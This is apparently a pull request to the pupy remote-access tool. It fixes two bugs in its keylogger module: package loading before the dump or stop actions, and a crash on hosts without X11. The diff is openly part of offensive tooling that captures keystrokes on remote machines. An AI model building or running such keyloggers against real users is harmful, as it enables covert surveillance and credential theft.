### PR TITLE
Keylogger

### DIFF
--- a/pupy/modules/keylogger.py
+++ b/pupy/modules/keylogger.py
@@ -31,9 +31,13 @@ class KeyloggerModule(PupyModule):
         self.success("keylogger stopped")
         
     def run(self, args):
+        if self.client.is_windows():
+            self.client.load_package("pupwinutils.keylogger")
+        else:
+            self.client.load_package("keylogger")
+
         if args.action=="start":
             if self.client.is_windows():
-                self.client.load_package("pupwinutils.keylogger")
                 with redirected_stdio(self.client.conn): #to see the output exception in case of error
                     if not self.client.conn.modules["pupwinutils.keylogger"].keylogger_start():
                         self.error("the keylogger is already started")
@@ -41,9 +45,11 @@ class KeyloggerModule(PupyModule):
                         self.success("keylogger started !")
             # not tested on android
             else:
-                self.client.load_package("keylogger")
                 with redirected_stdio(self.client.conn): #to see the output exception in case of error
-                    if not self.client.conn.modules["keylogger"].keylogger_start():
+                    r = self.client.conn.modules["keylogger"].keylogger_start()
+                    if r == 'no_x11':
+                        self.error("the keylogger does not work without x11 graphical interface")
+                    elif not r:
                         self.error("the keylogger is already started")
                     else:
                         self.success("keylogger started !")


### PR DESCRIPTION
I fix two bugs that I noticed on the keylogger: 

- when you run "dump" or "stop" options before the "start" one. The package was loaded when the start parameter was called, so now it's loaded even the dump or stop option are called. 
- trying to run the keylogger on the server that doesn't have the x11 graphical interface, the process crashed. So it tests if it could retrieve the keyboard layout before to do any action, if it fails the action is stopped and the process is still running. 